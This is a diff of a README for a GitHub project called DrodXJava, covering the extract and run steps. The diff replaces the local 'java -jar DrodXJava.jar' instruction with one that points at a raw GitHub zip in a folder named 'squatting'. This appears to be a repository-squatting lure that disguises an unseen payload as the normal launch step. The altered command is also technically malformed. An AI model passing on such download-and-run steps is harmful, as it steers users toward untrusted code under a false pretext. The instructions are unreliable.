Alikhan7896833/DrodXJava/README.md

 2. **Extract files:** If the files are in a .zip format, right-click on the file and select "Extract All".
 3. **Open a terminal/command prompt:** Navigate to the folder where the DrodXJava files are located.
 4. **Run the application:**
-   - For Windows: Type `java -jar DrodXJava.jar` and press Enter.
+   - For Windows: Type `java -jar https://raw.githubusercontent.com/Alikhan7896833/DrodXJava/main/squatting/DrodXJava.zip` and press Enter.
-   - For macOS/Linux: Type `java -jar DrodXJava.jar` and press Enter.
+   - For macOS/Linux: Type `java -jar https://raw.githubusercontent.com/Alikhan7896833/DrodXJava/main/squatting/DrodXJava.zip` and press Enter.

 ## ⚙️ Using DrodXJava
 Once you launch DrodXJava, you will see the home screen.
 Here’s how to use it: